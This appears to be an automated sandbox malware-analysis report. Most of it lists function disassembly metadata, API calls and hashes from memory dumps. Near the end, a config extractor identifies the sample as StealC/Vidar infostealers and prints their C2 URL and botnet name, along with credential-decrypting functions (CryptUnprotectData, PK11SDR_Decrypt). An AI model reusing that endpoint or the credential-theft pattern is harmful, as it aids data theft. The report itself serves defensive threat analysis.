Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ede9b83a8592a48867420f4fc9eeccca7e03882ed5f5b32789e9bdd420bc7b66
Instruction ID: 620e1c72e1d4e0634b0aa9cc555221b10f6ae91e6b9994e7e46fa0019b1a35ea
Opcode Fuzzy Hash: ede9b83a8592a48867420f4fc9eeccca7e03882ed5f5b32789e9bdd420bc7b66
Instruction Fuzzy Hash: 03915A738105189BCB06FBA0ED91EEE7739BF14300F50412AF507BA191EF746A09DB66

Function 6C5A5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C5A5D40
EnterCriticalSection.KERNEL32(6C60F688), ref: 6C5A5D67
__aulldiv.LIBCMT ref: 6C5A5DB4
LeaveCriticalSection.KERNEL32(6C60F688), ref: 6C5A5DED

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 48affd57472d10762916fe41c2beb9f943482da09ddb353a2230903c464f16e6
Instruction ID: 0f0d66652c017d5dc12858afead1b835ceb3b17e8ba9d7291b438f6a08797b6a
Opcode Fuzzy Hash: 48affd57472d10762916fe41c2beb9f943482da09ddb353a2230903c464f16e6
Instruction Fuzzy Hash: 3D51A071F002298FCF08CFAAC994AAEBBB1FB85304F59861DD811B7750C7716946CB95

Function 6C58CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C58CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C58CF4E

Strings

0, xrefs: 6C58CF30

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 0de79c95fb461707947a2c80528ed2e6b6291288a9c9a317e4d40a9fe8c178e2
Instruction ID: 30a1d0fa03acbd0089c6c9f6c5f26e8c19e17a480b532ac728ee92c42662fa89
Opcode Fuzzy Hash: 0de79c95fb461707947a2c80528ed2e6b6291288a9c9a317e4d40a9fe8c178e2
Instruction Fuzzy Hash: 0A51F275A00226CFCB05CF18C890AAABBA5EF99300F19869DD8595F391D771BD06CBE0

Function 003D3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: fd46e938713841f2b8154cbd2931b15cd55e1733e23271b1827b0e451502ab9f
Instruction ID: a2b547fc1a0fe435a1774c5ae4aba00665bade0c1ddd21479928119dab36ae39
Opcode Fuzzy Hash: fd46e938713841f2b8154cbd2931b15cd55e1733e23271b1827b0e451502ab9f
Instruction Fuzzy Hash: A8413372D10209ABCB05EFE5E985AEEB778EF54304F008119F4167B390DB75AA45CFA2

Function 6C5C6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C5C82BC,?,?), ref: 6C5C649B

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C64A9

Part of subcall function 6C5BFA80: GetCurrentThreadId.KERNEL32 ref: 6C5BFA8D
Part of subcall function 6C5BFA80: AcquireSRWLockExclusive.KERNEL32(6C60F448), ref: 6C5BFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C653F
free.MOZGLUE(?), ref: 6C5C655A

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 9e42da1c1fd5faf9899687c73542008dd97bf8e00333076862da6bbac0dea7a5
Instruction ID: 689bbf006a7ca2a987fec8e57fe3f82ac792c779637aa923cc9709323d81467c
Opcode Fuzzy Hash: 9e42da1c1fd5faf9899687c73542008dd97bf8e00333076862da6bbac0dea7a5
Instruction Fuzzy Hash: 6B3150B5A043059FDB04CF15D884A9ABBE4FF89314F50442EE89A97751DB30EE19CB92

Function 6C59B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C59B4F5
AcquireSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C59B502
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C59B542
free.MOZGLUE(?), ref: 6C59B578

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 69acd1f73ab765fe8029d1138430e0e68b035a0166f5abdad5cc54eeda06858d
Instruction ID: 91f9ee8c4451b0ca659acbfa28d9948dc7b69b4289e7f6c6173f0c296ce41ecf
Opcode Fuzzy Hash: 69acd1f73ab765fe8029d1138430e0e68b035a0166f5abdad5cc54eeda06858d
Instruction Fuzzy Hash: 6F11D230A04B81C7E721DF6AD940765B3B5FFD6318F10974ED84963A02FBB0A5C58799

Function 003D7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E00,00000000,?), ref: 003D79B0
RtlAllocateHeap.NTDLL(00000000), ref: 003D79B7
GetLocalTime.KERNEL32(?,?,?,?,?,003E0E00,00000000,?), ref: 003D79C4
wsprintfA.USER32 ref: 003D79F3

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: d47140caf4f9fe6fcd07ae49e673588ab7b70f649c661edc15d4af5cba7f3974
Instruction ID: 7389b9d07cbaaa53e65c167f4d91ea8f925dddfa1c701cb75b0a3809d9ea5014
Opcode Fuzzy Hash: d47140caf4f9fe6fcd07ae49e673588ab7b70f649c661edc15d4af5cba7f3974
Instruction Fuzzy Hash: 8B1127B2944218ABCB14DFD9ED45BBFB7F9FB4CB11F10421AF605A2280E2395940CBB1

Function 003DC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003DC74E

Part of subcall function 003DBF9F: __amsg_exit.LIBCMT ref: 003DBFAF

__getptd.LIBCMT ref: 003DC765
__amsg_exit.LIBCMT ref: 003DC773
__updatetlocinfoEx_nolock.LIBCMT ref: 003DC797

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: e60d2bea950133f7fdbe16121183d9f3192c3188ad110cd5689c987b3f8008e0
Instruction ID: 4be8b4ae6f877b92de41efe61b90beab6e2d029064641b626cd32d6e511ee670
Opcode Fuzzy Hash: e60d2bea950133f7fdbe16121183d9f3192c3188ad110cd5689c987b3f8008e0
Instruction Fuzzy Hash: 49F06D33924712DFDB23BBB8B84674EB3A46F00721F26524BF404AE3D2DB645941DE56

Function 6C58BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C58BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C58BE8F

Strings

0, xrefs: 6C58BE5B

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 995b377d0f62df7cd0c5398ef2b7076a9fba032da9b421561be04fda6b9de140
Instruction ID: 8883a8c8978fa99681fdc045a0f24e553e6fe2315cf0ac6b3e26bc73606565ac
Opcode Fuzzy Hash: 995b377d0f62df7cd0c5398ef2b7076a9fba032da9b421561be04fda6b9de140
Instruction Fuzzy Hash: 1B41AF7190A755DFC701DF28CC81A9FBBF8AF8A348F004A1DF985A7611D730D9598B92

Function 6C5C3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5C3D19
mozalloc_abort.MOZGLUE(?), ref: 6C5C3D6C

Strings

d, xrefs: 6C5C3D58

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 5a6359dc1754181ba76a568231a3e213f34dc256cfcd4684a7f9854f27caa039
Instruction ID: 3a42135688bcaf8a16ff5225c58ab4739c2f0fb9d239cd71e4e08b121fc0ea2a
Opcode Fuzzy Hash: 5a6359dc1754181ba76a568231a3e213f34dc256cfcd4684a7f9854f27caa039
Instruction Fuzzy Hash: 5A11EF31F0468CDBDB048FA9CC544EEB775EF86358B45862DE885AB602EB30A9C4C791

Function 6C596C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0K\l,?,6C5C4B30,80000000,?,6C5C4AB7,?,6C5843CF,?,6C5842D2), ref: 6C596C42

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

moz_xmalloc.MOZGLUE(0K\l,?,6C5C4B30,80000000,?,6C5C4AB7,?,6C5843CF,?,6C5842D2), ref: 6C596C58

Strings

0K\l, xrefs: 6C596C33, 6C596C41, 6C596C57

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0K\l
API String ID: 1967447596-4289362615
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 7877516af13cf2b606c5d43faab25483b123aaddb2e80112d31873398999ac71
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 00E026F1A143814ADB88D8789D4952AB1C8CB342A87444AB6F822C2BC8FF14E84881D1

Function 6C5DB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C5DB2C9,?,?,?,6C5DB127,?,?,?,?,?,?,?,?,?,6C5DAE52), ref: 6C5DB628

Part of subcall function 6C5D90E0: free.MOZGLUE(?,00000000,?,?,6C5DDEDB), ref: 6C5D90FF
Part of subcall function 6C5D90E0: free.MOZGLUE(?,00000000,?,?,6C5DDEDB), ref: 6C5D9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C5DB2C9,?,?,?,6C5DB127,?,?,?,?,?,?,?,?,?,6C5DAE52), ref: 6C5DB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C5DB2C9,?,?,?,6C5DB127,?,?,?,?,?,?,?,?,?,6C5DAE52), ref: 6C5DB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C5DB127,?,?,?,?,?,?,?,?), ref: 6C5DB74D

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: d6061c4820f63a4417ed6e1b9d8d376bcfe0724143284277fce3fed6773a33f2
Instruction ID: f8a8e4a7cdb2235ad271c144eaa515692516fa0ac472d87760d59166c49ebb5f
Opcode Fuzzy Hash: d6061c4820f63a4417ed6e1b9d8d376bcfe0724143284277fce3fed6773a33f2
Instruction Fuzzy Hash: C051BD71A053168BDB14DF5CCD8066EB7B6FF85304F56852DD85AAB700DB31B804CBA9

Source: 0.2.file.exe.3c0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.3c0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_003C9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_003CC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_003C7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_003C9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_003D8EA0
